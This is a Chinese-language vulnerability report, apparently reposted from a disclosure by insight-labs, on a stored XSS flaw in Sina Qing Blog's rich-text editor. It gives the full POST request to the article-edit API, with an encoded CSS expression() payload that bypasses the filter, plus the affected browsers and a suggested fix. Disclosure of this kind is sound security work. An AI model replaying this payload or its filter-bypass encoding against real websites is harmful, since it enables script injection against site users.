好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

新浪轻博客存存储型XSS漏洞 - 网站安全 - 自学p

轻博客富文本过滤不严格,style属性可以插入expression代码,导致存储型XSS。   漏洞触发方法:   提交地址:http://qing.weibo.com/blog/api/artedit.php POST数据: domain=0&body=<div+style="x:\00%26%2354%3B5xpression(alert(/xss by cc/));">http%3a%2f%2f%22'%26gt%3baaaaaa%3c%2fdiv%3e%3cbr%2f%3e&cover=&title=%e6%ac%a2%e8%bf%8e%e6%9d%a5%e5%88%b0%e6%96%b0%e6%b5%aa%e8%bd%bb%e5%8d%9a%e5%ae%a2%22'%3easdf&privacy=0&tag=%e8%bd%bb%e5%8d%9a%e5%ae%a2&type=text&pub=null&time=1336234239000&blogid=78111bb333001c4o&release=0   其中关键代码为 <div+style="x:\00%26%2354%3B5xpression(alert(/xss by cc/));">   访问页面: www.2cto.com  http://qing.weibo.com/2014387123/78111bb333001c4o.html 漏洞 证明: IE8 兼容性视图 IE7\IE6可触发 而且许多第三方双核 浏览器 在使用IE兼容性浏览的时候也可以触发,影响范围还是蛮大的。                   不知道为什么IE8没触发,比较奇怪。。 修复方案: 加强富文本过滤。 作者 insight-labs

查看更多关于新浪轻博客存存储型XSS漏洞 - 网站安全 - 自学p的详细内容...

  阅读:47次